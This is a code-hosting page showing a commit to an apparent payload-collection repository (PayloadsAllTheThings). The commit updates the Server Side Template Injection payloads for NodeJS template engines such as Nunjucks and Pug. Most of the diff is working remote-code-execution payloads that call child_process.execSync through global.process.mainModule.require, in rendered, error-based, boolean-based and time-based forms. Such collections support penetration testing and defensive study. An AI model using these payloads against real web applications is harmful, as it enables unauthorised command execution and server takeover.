admin/PayloadsAllTHINGS
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

SSTI:

Browse Source 
- Fixed NodeJS payloads
This commit is contained in:
vladko312
2026-01-03 18:43:24 +03:00
parent 7fb2ff75d7
commit abbbf2fc95
1 changed files with 7 additions and 5 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
Server Side Template Injection/JavaScript.md
View File

@@ -41,17 +41,17 @@ To use these payloads, wrap them in the appropriate tag.
```javascript ```javascript
// Rendered RCE // Rendered RCE
require("child_process").execSync("id") global.process.mainModule.require("child_process").execSync("id")
// Error-Based RCE // Error-Based RCE
require("Y:/A:/"+require("child_process").execSync("id")) global.process.mainModule.require("Y:/A:/"+global.process.mainModule.require("child_process").execSync("id"))
""["x"][require("child_process").execSync("id")] ""["x"][global.process.mainModule.require("child_process").execSync("id")]
// Boolean-Based RCE // Boolean-Based RCE
[""][0 + !(require("child_process").spawnSync("id", options={shell:true}).status===0)]["length"] [""][0 + !(global.process.mainModule.require("child_process").spawnSync("id", options={shell:true}).status===0)]["length"]
// Time-Based RCE // Time-Based RCE
require("child_process").execSync("id && sleep 5") global.process.mainModule.require("child_process").execSync("id && sleep 5")
``` ```
NunjucksJS is also capable of executing these payloads using `{{range.constructor(' ... ')()}}`. NunjucksJS is also capable of executing these payloads using `{{range.constructor(' ... ')()}}`.
@@ -149,6 +149,8 @@ ${= _.VERSION}
## Pug ## Pug
> Universal payloads also work for Pug.
[Official website](https://pugjs.org/api/getting-started.html) [Official website](https://pugjs.org/api/getting-started.html)
> >